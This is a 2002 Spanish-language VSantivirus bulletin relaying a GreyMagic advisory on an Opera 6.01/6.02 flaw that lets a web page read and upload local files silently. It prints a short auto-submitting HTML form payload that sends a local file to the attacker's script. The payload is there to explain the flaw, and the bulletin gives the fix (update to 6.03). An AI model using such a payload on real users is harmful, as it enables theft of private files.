Controlado desde el
19/10/97 por NedStat
|
Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
Es usted nuestro
visitante número desde
el 12 de agosto de 1996
Opera permite la descarga de archivos sin autorización
|
|
VSantivirus No. 690 - Año 6 - Martes 28 de mayo de 2002
Opera permite la descarga de archivos sin autorización
http://www.vsantivirus.com/vul-opera-file-read.htm
Aviso de seguridad: Lectura de cualquier archivo en Opera
Nombre original: Reading ANY local file in Opera.
Fecha original: 7/may/02
Autor/descubridor: GreyMagic Software, Israel <security@greymagic.com>
Aplicación vulnerable: Opera 6.01 y 6.02 en plataformas Windows.
Severidad: Alta
Riesgo: Robo de información confidencial de cualquier origen
Fabricante: Opera.com (fue avisado el 15 de mayo y el 16 estaba resuelto el problema, en la versión 6.03 del programa).
Referencia: GreyMagic Security Advisory GM#001-OP
Una grave vulnerabilidad (tal vez la más importante hasta la fecha), ha sido descubierta en las versiones 6.01 y 6.02 del navegador Opera para Windows. La misma permite que desde un sitio Web malicioso se pueda descargar cualquier archivo de la computadora de la víctima.
Opera es utilizado por muchos usuarios, por ser pequeño y rápido, y por no sufrir de tantas fallas de seguridad como el Internet Explorer. Sin embargo, esto no significa que sea inmune a las brechas de seguridad, ya que no es esta la primera vulnerabilidad detectada en él, aunque los expertos coinciden que tal vez sí sea la más grave.
El problema se produce por el modo que Opera maneja el envío de formularios que involucra una transferencia de datos vía HTTP. Normalmente, se muestra una ventana de diálogo solicitando la confirmación o no, para comenzar el traslado de un archivo. Sin embargo, mediante la manipulación de ciertas etiquetas en el código de los formularios, se puede evitar la aparición de esta advertencia, haciendole creer al usuario que ninguna transferencia va a realizarse.
Una demostración proporcionada por los descubridores de la falla, implementa un código que transfiere un archivo ficticio
"c:/test.txt" al host del atacante. Esto se produce sin ninguna acción intermedia del usuario. La ejecución del exploit es automática.
El ejemplo:
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data"
action="recFile.php" name="secForm">
<input type="file" name="expFile"
value="c:\test.txt " style="visibility:hidden">
</form>
</body>
La vulnerabilidad se produce al agregarse unos caracteres al contenido del campo
"value":
c:\test.txt
La solución pasa por descargar e instalar la versión más reciente (6.03 o superior), que ya ha resuelto la falla. Tampoco son afectadas las versiones 6.0 o anteriores.
Referencias:
Opera.com
http://www.opera.com/
GreyMagic Security Advisory GM#001-OP
http://sec.greymagic.com/adv/gm001-op/
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
|
|
|